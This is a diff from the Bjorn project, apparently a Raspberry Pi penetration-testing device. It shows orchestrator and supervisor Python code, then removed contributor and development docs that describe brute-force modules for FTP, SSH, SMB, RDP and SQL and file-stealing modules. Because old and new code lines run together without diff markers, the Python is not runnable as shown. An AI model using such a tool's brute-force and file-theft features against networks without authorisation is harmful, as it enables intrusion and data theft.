top_n = int(self.shared_data.config.get("tracemalloc_top_n", 10) or 10)
top_n = max(3, min(top_n, 25))
snap = tracemalloc.take_snapshot()
if self._tm_prev_snapshot is not None:
stats = snap.compare_to(self._tm_prev_snapshot, "lineno")[:top_n]
logger.info(f"mem_top (tracemalloc diff, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
else:
stats = snap.statistics("lineno")[:top_n]
logger.info(f"mem_top (tracemalloc, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
self._tm_prev_snapshot = snap
except Exception as exc:
logger.error_throttled(
f"Health monitor tracemalloc failure: {exc}",
key="health_tracemalloc_error",
interval_s=300,
)
except Exception as exc:
logger.error_throttled(
f"Health monitor loop failure: {exc}",
key="health_loop_error",
interval_s=120,
)
class Bjorn:
"""Main class for Bjorn. Manages the primary operations of the application."""
def __init__(self, shared_data):
self.shared_data = shared_data
"""Main class for Bjorn. Manages orchestration lifecycle."""
def __init__(self, shared_data_):
self.shared_data = shared_data_
self.commentaire_ia = Commentaireia()
self.orchestrator_thread = None
self.orchestrator = None
self.network_connected = False
self.wifi_connected = False
self.previous_network_connected = None # Pour garder une trace de l'état précédent
self.previous_network_connected = None
self._orch_lock = threading.Lock()
self._last_net_check = 0 # Throttling for network scan
self._last_orch_stop_attempt = 0.0
def run(self):
"""Main loop for Bjorn. Waits for Wi-Fi connection and starts Orchestrator."""
# Wait for startup delay if configured in shared data
if hasattr(self.shared_data, 'startup_delay') and self.shared_data.startup_delay > 0:
"""Main loop for Bjorn. Waits for network and starts/stops Orchestrator based on mode."""
if hasattr(self.shared_data, "startup_delay") and self.shared_data.startup_delay > 0:
logger.info(f"Waiting for startup delay: {self.shared_data.startup_delay} seconds")
time.sleep(self.shared_data.startup_delay)
# Main loop to keep Bjorn running
backoff_s = 1.0
while not self.shared_data.should_exit:
if not self.shared_data.manual_mode:
self.check_and_start_orchestrator()
time.sleep(10) # Main loop idle waiting
try:
# Manual/Bifrost mode must stop orchestration.
# BIFROST: WiFi is in monitor mode, no network available for scans.
current_mode = self.shared_data.operation_mode
if current_mode in ("MANUAL", "BIFROST", "LOKI"):
# Avoid spamming stop requests if already stopped.
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
self.stop_orchestrator()
else:
self.check_and_start_orchestrator()
time.sleep(5)
backoff_s = 1.0 # Reset backoff on success
except Exception as exc:
logger.error(f"Bjorn main loop error: {exc}")
logger.error_throttled(
"Bjorn main loop entering backoff due to repeated errors",
key="bjorn_main_loop_backoff",
interval_s=60,
)
time.sleep(backoff_s)
backoff_s = min(backoff_s * 2.0, 30.0)
def check_and_start_orchestrator(self):
"""Check Wi-Fi and start the orchestrator if connected."""
if self.shared_data.operation_mode in ("MANUAL", "BIFROST", "LOKI"):
return
if self.is_network_connected():
self.wifi_connected = True
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
self.start_orchestrator()
else:
self.wifi_connected = False
logger.info("Waiting for Wi-Fi connection to start Orchestrator...")
logger.info_throttled(
"Waiting for network connection to start Orchestrator...",
key="bjorn_wait_network",
interval_s=30,
)
def start_orchestrator(self):
"""Start the orchestrator thread."""
self.is_network_connected() # reCheck if Wi-Fi is connected before starting the orchestrator
# time.sleep(10) # Wait for network to stabilize
if self.wifi_connected: # Check if Wi-Fi is connected before starting the orchestrator
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.shared_data.manual_mode = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(target=self.orchestrator.run)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started, automatic mode activated.")
else:
logger.info("Orchestrator thread is already running.")
else:
pass
def stop_orchestrator(self):
"""Stop the orchestrator thread."""
self.shared_data.manual_mode = True
logger.info("Stop button pressed. Manual mode activated & Stopping Orchestrator...")
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.info("Stopping Orchestrator thread...")
self.shared_data.orchestrator_should_exit = True
self.orchestrator_thread.join()
logger.info("Orchestrator thread stopped.")
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.manual_mode = True
else:
logger.info("Orchestrator thread is not running.")
with self._orch_lock:
# Re-check network inside lock
if not self.network_connected:
return
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.debug("Orchestrator thread is already running.")
return
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(
target=self.orchestrator.run,
daemon=True,
name="OrchestratorMain",
)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started.")
def stop_orchestrator(self):
with self._orch_lock:
thread = self.orchestrator_thread
if thread is None or not thread.is_alive():
self.orchestrator_thread = None
self.orchestrator = None
return
# Keep MANUAL sticky so supervisor does not auto-restart orchestration,
# but only if the current mode isn't already handling it.
# - MANUAL/BIFROST: already non-AUTO, no need to change
# - AUTO: let it be — orchestrator will restart naturally (e.g. after Bifrost auto-disable)
try:
current = self.shared_data.operation_mode
if current == "AI":
self.shared_data.operation_mode = "MANUAL"
except Exception:
pass
now = time.time()
if now - self._last_orch_stop_attempt >= 10.0:
logger.info("Stop requested: stopping Orchestrator")
self._last_orch_stop_attempt = now
self.shared_data.orchestrator_should_exit = True
self.shared_data.queue_event.set() # Wake up thread
thread.join(timeout=10.0)
if thread.is_alive():
logger.warning_throttled(
"Orchestrator thread did not stop gracefully",
key="orch_stop_not_graceful",
interval_s=20,
)
# Still reset status so UI doesn't stay stuck on the
# last action while the thread finishes in the background.
else:
self.orchestrator_thread = None
self.orchestrator = None
# Always reset display state regardless of whether join succeeded.
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
self.shared_data.active_action = None
self.shared_data.update_status("IDLE", "")
def is_network_connected(self):
"""Checks for network connectivity on eth0 or wlan0 using ip command (replacing deprecated ifconfig)."""
logger = logging.getLogger("Bjorn.py")
"""Checks for network connectivity with throttling and low-CPU checks."""
now = time.time()
# Throttling: Do not scan more than once every 10 seconds
if now - self._last_net_check < 10:
return self.network_connected
self._last_net_check = now
def interface_has_ip(interface_name):
try:
# Use 'ip -4 addr show <interface>' to check for IPv4 address
# OPTIMIZATION: Check /sys/class/net first to avoid spawning subprocess if interface doesn't exist
if not os.path.exists(f"/sys/class/net/{interface_name}"):
return False
# Check for IP address
result = subprocess.run(
['ip', '-4', 'addr', 'show', interface_name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
["ip", "-4", "addr", "show", interface_name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
timeout=2,
)
if result.returncode != 0:
return False
# Check if output contains "inet" which indicates an IP address
return 'inet' in result.stdout
return "inet " in result.stdout
except Exception:
return False
eth_connected = interface_has_ip('eth0')
wifi_connected = interface_has_ip('wlan0')
eth_connected = interface_has_ip("eth0")
wifi_connected = interface_has_ip("wlan0")
self.network_connected = eth_connected or wifi_connected
if self.network_connected != self.previous_network_connected:
if self.network_connected:
logger.info(f"Network is connected (eth0={eth_connected}, wlan0={wifi_connected}).")
logger.info(f"Network status changed: Connected (eth0={eth_connected}, wlan0={wifi_connected})")
else:
logger.warning("No active network connections found.")
logger.warning("Network status changed: Connection lost")
self.previous_network_connected = self.network_connected
return self.network_connected
@staticmethod
def start_display():
"""Start the display thread"""
display = Display(shared_data)
display_thread = threading.Thread(target=display.run)
display_thread.start()
return display_thread
def start_display(old_display=None):
# Ensure the previous Display's controller is fully stopped to release frames
if old_display is not None:
try:
old_display.display_controller.stop(timeout=3.0)
except Exception:
pass
def handle_exit(sig, frame, display_thread, bjorn_thread, web_thread):
"""Handles the termination of the main, display, and web threads."""
display = Display(shared_data)
display_thread = threading.Thread(
target=display.run,
daemon=True,
name="DisplayMain",
)
display_thread.start()
return display_thread, display
def _request_shutdown():
"""Signals all threads to stop."""
shared_data.should_exit = True
shared_data.orchestrator_should_exit = True # Ensure orchestrator stops
shared_data.display_should_exit = True # Ensure display stops
shared_data.webapp_should_exit = True # Ensure web server stops
handle_exit_display(sig, frame, display_thread)
if display_thread.is_alive():
display_thread.join()
if bjorn_thread.is_alive():
bjorn_thread.join()
if web_thread.is_alive():
web_thread.join()
logger.info("Main loop finished. Clean exit.")
sys.exit(0)
shared_data.orchestrator_should_exit = True
shared_data.display_should_exit = True
shared_data.webapp_should_exit = True
shared_data.queue_event.set()
def handle_exit(
sig,
frame,
display_thread,
bjorn_thread,
web_thread_obj,
health_thread=None,
runtime_state_thread=None,
from_signal=False,
):
global _shutdown_started
with _shutdown_lock:
if _shutdown_started:
if from_signal:
logger.warning("Forcing exit (SIGINT/SIGTERM received twice)")
os._exit(130)
return
_shutdown_started = True
logger.info(f"Shutdown signal received: {sig}")
_request_shutdown()
# 1. Stop Display (handles EPD cleanup)
try:
handle_exit_display(sig, frame, display_thread)
except Exception:
pass
# 2. Stop Health Monitor
try:
if health_thread and hasattr(health_thread, "stop"):
health_thread.stop()
except Exception:
pass
# 2b. Stop Runtime State Updater
try:
if runtime_state_thread and hasattr(runtime_state_thread, "stop"):
runtime_state_thread.stop()
except Exception:
pass
# 2c. Stop Sentinel Watchdog
try:
engine = getattr(shared_data, 'sentinel_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 2d. Stop Bifrost Engine
try:
engine = getattr(shared_data, 'bifrost_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 3. Stop Web Server
try:
if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
web_thread_obj.shutdown()
except Exception:
pass
# 4. Join all threads
for thread in (display_thread, bjorn_thread, web_thread_obj, health_thread, runtime_state_thread):
try:
if thread and thread.is_alive():
thread.join(timeout=5.0)
except Exception:
pass
# 5. Close Database (Prevent corruption)
try:
if hasattr(shared_data, "db") and hasattr(shared_data.db, "close"):
shared_data.db.close()
except Exception as exc:
logger.error(f"Database shutdown error: {exc}")
logger.info("Bjorn stopped. Clean exit.")
_release_instance_lock()
if from_signal:
sys.exit(0)
def _install_thread_excepthook():
def _hook(args):
logger.error(f"Unhandled thread exception: {args.thread.name} - {args.exc_type.__name__}: {args.exc_value}")
# We don't force shutdown here to avoid killing the app on minor thread glitches,
# unless it's critical. The Crash Shield will handle restarts.
threading.excepthook = _hook
if __name__ == "__main__":
logger.info("Starting threads")
if not _acquire_instance_lock():
sys.exit(1)
atexit.register(_release_instance_lock)
_install_thread_excepthook()
display_thread = None
display_instance = None
bjorn_thread = None
health_thread = None
runtime_state_thread = None
last_gc_time = time.time()
try:
logger.info("Loading shared data config...")
logger.info("Bjorn Startup: Loading config...")
shared_data.load_config()
logger.info("Starting display thread...")
shared_data.display_should_exit = False # Initialize display should_exit
display_thread = Bjorn.start_display()
logger.info("Starting Runtime State Updater...")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
logger.info("Starting Bjorn thread...")
logger.info("Starting Display...")
shared_data.display_should_exit = False
display_thread, display_instance = Bjorn.start_display()
logger.info("Starting Bjorn Core...")
bjorn = Bjorn(shared_data)
shared_data.bjorn_instance = bjorn # Assigner l'instance de Bjorn à shared_data
bjorn_thread = threading.Thread(target=bjorn.run)
shared_data.bjorn_instance = bjorn
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
if shared_data.config["websrv"]:
logger.info("Starting the web server...")
web_thread.start()
if shared_data.config.get("websrv", False):
logger.info("Starting Web Server...")
if not web_thread.is_alive():
web_thread.start()
signal.signal(signal.SIGINT, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
signal.signal(signal.SIGTERM, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
health_interval = int(shared_data.config.get("health_log_interval", 60))
health_thread = HealthMonitor(shared_data, interval_s=health_interval)
health_thread.start()
except Exception as e:
logger.error(f"An exception occurred during thread start: {e}")
handle_exit_display(signal.SIGINT, None)
exit(1)
# Sentinel watchdog — start if enabled in config
try:
from sentinel import SentinelEngine
sentinel_engine = SentinelEngine(shared_data)
shared_data.sentinel_engine = sentinel_engine
if shared_data.config.get("sentinel_enabled", False):
sentinel_engine.start()
logger.info("Sentinel watchdog started")
else:
logger.info("Sentinel watchdog loaded (disabled)")
except Exception as e:
logger.warning("Sentinel init skipped: %s", e)
# Bifrost engine — start if enabled in config
try:
from bifrost import BifrostEngine
bifrost_engine = BifrostEngine(shared_data)
shared_data.bifrost_engine = bifrost_engine
if shared_data.config.get("bifrost_enabled", False):
bifrost_engine.start()
logger.info("Bifrost engine started")
else:
logger.info("Bifrost engine loaded (disabled)")
except Exception as e:
logger.warning("Bifrost init skipped: %s", e)
# Loki engine — start if enabled in config
try:
from loki import LokiEngine
loki_engine = LokiEngine(shared_data)
shared_data.loki_engine = loki_engine
if shared_data.config.get("loki_enabled", False):
loki_engine.start()
logger.info("Loki engine started")
else:
logger.info("Loki engine loaded (disabled)")
except Exception as e:
logger.warning("Loki init skipped: %s", e)
# LLM Bridge — warm up singleton (starts LaRuche mDNS discovery if enabled)
try:
from llm_bridge import LLMBridge
LLMBridge() # Initialise singleton, kicks off background discovery
logger.info("LLM Bridge initialised")
except Exception as e:
logger.warning("LLM Bridge init skipped: %s", e)
# MCP Server — start if enabled in config
try:
import mcp_server
if shared_data.config.get("mcp_enabled", False):
mcp_server.start()
logger.info("MCP server started")
else:
logger.info("MCP server loaded (disabled — enable via Settings)")
except Exception as e:
logger.warning("MCP server init skipped: %s", e)
# Signal Handlers
exit_handler = lambda s, f: handle_exit(
s,
f,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
True,
)
signal.signal(signal.SIGINT, exit_handler)
signal.signal(signal.SIGTERM, exit_handler)
# --- SUPERVISOR LOOP (Crash Shield) ---
restart_times = []
max_restarts = 5
restart_window_s = 300
logger.info("Bjorn Supervisor running.")
while not shared_data.should_exit:
time.sleep(2) # CPU Friendly polling
now = time.time()
# --- OPTIMIZATION: Periodic Garbage Collection ---
# Forces cleanup of circular references and free RAM every 2 mins
if now - last_gc_time > 120:
gc.collect()
last_gc_time = now
logger.debug("System: Forced Garbage Collection executed.")
# --- CRASH SHIELD: Bjorn Thread ---
if bjorn_thread and not bjorn_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Bjorn Main Thread")
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
else:
logger.critical("Crash Shield: Bjorn exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Display Thread ---
if display_thread and not display_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Display Thread")
display_thread, display_instance = Bjorn.start_display(old_display=display_instance)
else:
logger.critical("Crash Shield: Display exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Runtime State Updater ---
if runtime_state_thread and not runtime_state_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Runtime State Updater")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
else:
logger.critical("Crash Shield: Runtime State Updater exceeded restart budget. Shutting down.")
_request_shutdown()
break
# Exit cleanup
if health_thread:
health_thread.stop()
if runtime_state_thread:
runtime_state_thread.stop()
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except Exception as exc:
logger.critical(f"Critical bootstrap failure: {exc}")
_request_shutdown()
# Try to clean up anyway
try:
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except:
pass
sys.exit(1)

View File

@@ -1,40 +0,0 @@
# 📝 Code of Conduct
Take Note About This... **Take Note...**
## 🤝 Our Commitment
We are committed to fostering an open and welcoming environment for all contributors. As such, everyone who participates in **Bjorn** is expected to adhere to the following code of conduct.
## 🌟 Expected Behavior
- **Respect:** Be respectful of differing viewpoints and experiences.
- **Constructive Feedback:** Provide constructive feedback and be open to receiving it.
- **Empathy and Kindness:** Show empathy and kindness towards other contributors.
- **Respect for Maintainers:** Respect the decisions of the maintainers.
- **Positive Intent:** Assume positive intent in interactions with others.
## 🚫 Unacceptable Behavior
- **Harassment or Discrimination:** Harassment or discrimination in any form.
- **Inappropriate Language or Imagery:** Use of inappropriate language or imagery.
- **Personal Attacks:** Personal attacks or insults.
- **Public or Private Harassment:** Public or private harassment.
## 📢 Reporting Misconduct
If you encounter any behavior that violates this code of conduct, please report it by contacting [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com). All complaints will be reviewed and handled appropriately.
## ⚖️ Enforcement
Instances of unacceptable behavior may be addressed by the project maintainers, who are responsible for clarifying and enforcing this code of conduct. Violations may result in temporary or permanent bans from the project and related spaces.
## 🙏 Acknowledgments
This code of conduct is adapted from the [Contributor Covenant, version 2.0](https://www.contributor-covenant.org/version/2/0/code_of_conduct.html).
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,51 +0,0 @@
# 🤝 Contributing to Bjorn
We welcome contributions to Bjorn! To make sure the process goes smoothly, please follow these guidelines:
## 📋 Code of Conduct
Please note that all participants in our project are expected to follow our [Code of Conduct](#-code-of-conduct). Make sure to review it before contributing.
## 🛠 How to Contribute
1. **Fork the repository**:
Fork the project to your GitHub account using the GitHub interface.
2. **Create a new branch**:
Use a descriptive branch name for your feature or bugfix:
git checkout -b feature/your-feature-name
3. **Make your changes**:
Implement your feature or fix the bug in your branch. Make sure to include tests where applicable and follow coding standards.
4. **Test your changes**:
Run the test suite to ensure your changes dont break any functionality:
- ...
5. **Commit your changes**:
Use meaningful commit messages that explain what you have done:
git commit -m "Add feature/fix: Description of changes"
6. **Push your changes**:
Push your changes to your fork:
git push origin feature/your-feature-name
7. **Submit a Pull Request**:
Create a pull request on the main repository, detailing the changes youve made. Link any issues your changes resolve and provide context.
## 📑 Guidelines for Contributions
- **Lint your code** before submitting a pull request. We use [ESLint](https://eslint.org/) for frontend and [pylint](https://www.pylint.org/) for backend linting.
- Ensure **test coverage** for your code. Uncovered code may delay the approval process.
- Write clear, concise **commit messages**.
Thank you for helping improve!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,373 +0,0 @@
# 🖲️ Bjorn Development
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Design](#-design)
- [Educational Aspects](#-educational-aspects)
- [Disclaimer](#-disclaimer)
- [Extensibility](#-extensibility)
- [Development Status](#-development-status)
- [Project Structure](#-project-structure)
- [Core Files](#-core-files)
- [Actions](#-actions)
- [Data Structure](#-data-structure)
- [Detailed Project Description](#-detailed-project-description)
- [Behaviour of Bjorn](#-behavior-of-bjorn)
- [Running Bjorn](#-running-bjorn)
- [Manual Start](#-manual-start)
- [Service Control](#-service-control)
- [Fresh Start](#-fresh-start)
- [Important Configuration Files](#-important-configuration-files)
- [Shared Configuration](#-shared-configuration-shared_configjson)
- [Actions Configuration](#-actions-configuration-actionsjson)
- [E-Paper Display Support](#-e-paper-display-support)
- [Ghosting Removed](#-ghosting-removed)
- [Development Guidelines](#-development-guidelines)
- [Adding New Actions](#-adding-new-actions)
- [Testing](#-testing)
- [Web Interface](#-web-interface)
- [Project Roadmap](#-project-roadmap)
- [Current Focus](#-future-plans)
- [Future Plans](#-future-plans)
- [License](#-license)
## 🎨 Design
- **Portability**: Self-contained and portable device, ideal for penetration testing.
- **Modularity**: Extensible architecture allowing addition of new actions.
- **Visual Interface**: The e-Paper HAT provides a visual interface for monitoring the ongoing actions, displaying results or stats, and interacting with Bjorn .
## 📔 Educational Aspects
- **Learning Tool**: Designed as an educational tool to understand cybersecurity concepts and penetration testing techniques.
- **Practical Experience**: Provides a practical means for students and professionals to familiarize themselves with network security practices and vulnerability assessment tools.
## ✒️ Disclaimer
- **Ethical Use**: This project is strictly for educational purposes.
- **Responsibility**: The author and contributors disclaim any responsibility for misuse of Bjorn.
- **Legal Compliance**: Unauthorized use of this tool for malicious activities is prohibited and may be prosecuted by law.
## 🧩 Extensibility
- **Evolution**: The main purpose of Bjorn is to gain new actions and extend his arsenal over time.
- **Modularity**: Actions are designed to be modular and can be easily extended or modified to add new functionality.
- **Possibilities**: From capturing pcap files to cracking hashes, man-in-the-middle attacks, and more—the possibilities are endless.
- **Contribution**: It's up to the user to develop new actions and add them to the project.
## 🔦 Development Status
- **Project Status**: Ongoing development.
- **Current Version**: Scripted auto-installer, or manual installation. Not yet packaged with Raspberry Pi OS.
- **Reason**: The project is still in an early stage, requiring further development and debugging.
### 🗂️ Project Structure
```
Bjorn/
├── Bjorn.py
├── comment.py
├── display.py
├── epd_helper.py
├── init_shared.py
├── kill_port_8000.sh
├── logger.py
├── orchestrator.py
├── requirements.txt
├── shared.py
├── utils.py
├── webapp.py
├── __init__.py
├── actions/
│ ├── ftp_connector.py
│ ├── ssh_connector.py
│ ├── smb_connector.py
│ ├── rdp_connector.py
│ ├── telnet_connector.py
│ ├── sql_connector.py
│ ├── steal_files_ftp.py
│ ├── steal_files_ssh.py
│ ├── steal_files_smb.py
│ ├── steal_files_rdp.py
│ ├── steal_files_telnet.py
│ ├── steal_data_sql.py
│ ├── nmap_vuln_scanner.py
│ ├── scanning.py
│ └── __init__.py
├── backup/
│ ├── backups/
│ └── uploads/
├── config/
├── data/
│ ├── input/
│ │ └── dictionary/
│ ├── logs/
│ └── output/
│ ├── crackedpwd/
│ ├── data_stolen/
│ ├── scan_results/
│ ├── vulnerabilities/
│ └── zombies/
└── resources/
└── waveshare_epd/
```
### ⚓ Core Files
#### Bjorn.py
The main entry point for the application. It initializes and runs the main components, including the network scanner, orchestrator, display, and web server.
#### comment.py
Handles generating all the Bjorn comments displayed on the e-Paper HAT based on different themes/actions and statuses.
#### display.py
Manages the e-Paper HAT display, updating the screen with Bjorn character, the dialog/comments, and the current information such as network status, vulnerabilities, and various statistics.
#### epd_helper.py
Handles the low-level interactions with the e-Paper display hardware.
#### logger.py
Defines a custom logger with specific formatting and handlers for console and file logging. It also includes a custom log level for success messages.
#### orchestrator.py
Bjorns AI, a heuristic engine that orchestrates the different actions such as network scanning, vulnerability scanning, attacks, and file stealing. It loads and executes actions based on the configuration and sets the status of the actions and Bjorn.
#### shared.py
Defines the `SharedData` class that holds configuration settings, paths, and methods for updating and managing shared data across different modules.
#### init_shared.py
Initializes shared data that is used across different modules. It loads the configuration and sets up necessary paths and variables.
#### utils.py
Contains utility functions used throughout the project.
#### webapp.py
Sets up and runs a web server to provide a web interface for changing settings, monitoring and interacting with Bjorn.
### ▶️ Actions
#### actions/scanning.py
Conducts network scanning to identify live hosts and open ports. It updates the network knowledge base (`netkb`) and generates scan results.
#### actions/nmap_vuln_scanner.py
Performs vulnerability scanning using Nmap. It parses the results and updates the vulnerability summary for each host.
#### Protocol Connectors
- **ftp_connector.py**: Brute-force attacks on FTP services.
- **ssh_connector.py**: Brute-force attacks on SSH services.
- **smb_connector.py**: Brute-force attacks on SMB services.
- **rdp_connector.py**: Brute-force attacks on RDP services.
- **telnet_connector.py**: Brute-force attacks on Telnet services.
- **sql_connector.py**: Brute-force attacks on SQL services.
#### File Stealing Modules
- **steal_files_ftp.py**: Steals files from FTP servers.
- **steal_files_smb.py**: Steals files from SMB shares.
- **steal_files_ssh.py**: Steals files from SSH servers.
- **steal_files_telnet.py**: Steals files from Telnet servers.
- **steal_data_sql.py**: Extracts data from SQL databases.
### 📇 Data Structure
#### Network Knowledge Base (netkb.csv)
Located at `data/netkb.csv`. Stores information about:
- Known hosts and their status. (Alive or offline)
- Open ports and vulnerabilities.
- Action execution history. (Success or failed)
**Preview Example:**
![netkb1](https://github.com/infinition/Bjorn/assets/37984399/f641a565-2765-4280-a7d7-5b25c30dcea5)
![netkb2](https://github.com/infinition/Bjorn/assets/37984399/f08114a2-d7d1-4f50-b1c4-a9939ba66056)
#### Scan Results
Located in `data/output/scan_results/`.
This file is generated everytime the network is scanned. It is used to consolidate the data and update netkb.
**Example:**
![Scan result](https://github.com/infinition/Bjorn/assets/37984399/eb4a313a-f90c-4c43-b699-3678271886dc)
#### Live Status (livestatus.csv)
Contains real-time information displayed on the e-Paper HAT:
- Total number of known hosts.
- Currently alive hosts.
- Open ports count.
- Other runtime statistics.
## 📖 Detailed Project Description
### 👀 Behavior of Bjorn
Once launched, Bjorn performs the following steps:
1. **Initialization**: Loads configuration, initializes shared data, and sets up necessary components such as the e-Paper HAT display.
2. **Network Scanning**: Scans the network to identify live hosts and open ports. Updates the network knowledge base (`netkb`) with the results.
3. **Orchestration**: Orchestrates different actions based on the configuration and network knowledge base. This includes performing vulnerability scanning, attacks, and file stealing.
4. **Vulnerability Scanning**: Performs vulnerability scans on identified hosts and updates the vulnerability summary.
5. **Brute-Force Attacks and File Stealing**: Starts brute-force attacks and steals files based on the configuration criteria.
6. **Display Updates**: Continuously updates the e-Paper HAT display with current information such as network status, vulnerabilities, and various statistics. Bjorn also displays random comments based on different themes and statuses.
7. **Web Server**: Provides a web interface for monitoring and interacting with Bjorn.
## ▶️ Running Bjorn
### 📗 Manual Start
To manually start Bjorn (without the service, ensure the service is stopped « sudo systemctl stop bjorn.service »):
```bash
cd /home/bjorn/Bjorn
# Run Bjorn
sudo python Bjorn.py
```
### 🕹️ Service Control
Control the Bjorn service:
```bash
# Start Bjorn
sudo systemctl start bjorn.service
# Stop Bjorn
sudo systemctl stop bjorn.service
# Check status
sudo systemctl status bjorn.service
# View logs
sudo journalctl -u bjorn.service
```
### 🪄 Fresh Start
To reset Bjorn to a clean state:
```bash
sudo rm -rf /home/bjorn/Bjorn/config/*.json \
/home/bjorn/Bjorn/data/*.csv \
/home/bjorn/Bjorn/data/*.log \
/home/bjorn/Bjorn/data/output/data_stolen/* \
/home/bjorn/Bjorn/data/output/crackedpwd/* \
/home/bjorn/Bjorn/config/* \
/home/bjorn/Bjorn/data/output/scan_results/* \
/home/bjorn/Bjorn/__pycache__ \
/home/bjorn/Bjorn/config/__pycache__ \
/home/bjorn/Bjorn/data/__pycache__ \
/home/bjorn/Bjorn/actions/__pycache__ \
/home/bjorn/Bjorn/resources/__pycache__ \
/home/bjorn/Bjorn/web/__pycache__ \
/home/bjorn/Bjorn/*.log \
/home/bjorn/Bjorn/resources/waveshare_epd/__pycache__ \
/home/bjorn/Bjorn/data/logs/* \
/home/bjorn/Bjorn/data/output/vulnerabilities/* \
/home/bjorn/Bjorn/data/logs/*
```
Everything will be recreated automatically at the next launch of Bjorn.
## ❇️ Important Configuration Files
### 🔗 Shared Configuration (`shared_config.json`)
Defines various settings for Bjorn, including:
- Boolean settings (`manual_mode`, `websrv`, `debug_mode`, etc.).
- Time intervals and delays.
- Network settings.
- Port lists and blacklists.
These settings are accessible on the webpage.
### 🛠️ Actions Configuration (`actions.json`)
Lists the actions to be performed by Bjorn, including (dynamically generated with the content of the folder):
- Module and class definitions.
- Port assignments.
- Parent-child relationships.
- Action status definitions.
## 📟 E-Paper Display Support
Currently, hardcoded for the 2.13-inch V2 & V4 e-Paper HAT.
My program automatically detect the screen model and adapt the python expressions into my code.
For other versions:
- As I don't have the v1 and v3 to validate my algorithm, I just hope it will work properly.
### 🍾 Ghosting Removed!
In my journey to make Bjorn work with the different screen versions, I struggled, hacking several parameters and found out that it was possible to remove the ghosting of screens! I let you see this, I think this method will be very useful for all other projects with the e-paper screen!
## ✍️ Development Guidelines
### Adding New Actions
1. Create a new action file in `actions/`.
2. Implement required methods:
- `__init__(self, shared_data)`
- `execute(self, ip, port, row, status_key)`
3. Add the action to `actions.json`.
4. Follow existing action patterns.
### 🧪 Testing
1. Create a test environment.
2. Use an isolated network.
3. Follow ethical guidelines.
4. Document test cases.
## 💻 Web Interface
- **Access**: `http://[device-ip]:8000`
- **Features**:
- Real-time monitoring with a console.
- Configuration management.
- Viewing results. (Credentials and files)
- System control.
## 🧭 Project Roadmap
### 🪛 Current Focus
- Stability improvements.
- Bug fixes.
- Service reliability.
- Documentation updates.
### 🧷 Future Plans
- Additional attack modules.
- Enhanced reporting.
- Improved user interface.
- Extended protocol support.
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,468 +0,0 @@
## 🔧 Installation and Configuration
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Prerequisites](#-prerequisites)
- [Quick Install](#-quick-install)
- [Manual Install](#-manual-install)
- [License](#-license)
Use Raspberry Pi Imager to install your OS
https://www.raspberrypi.com/software/
### 📌 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
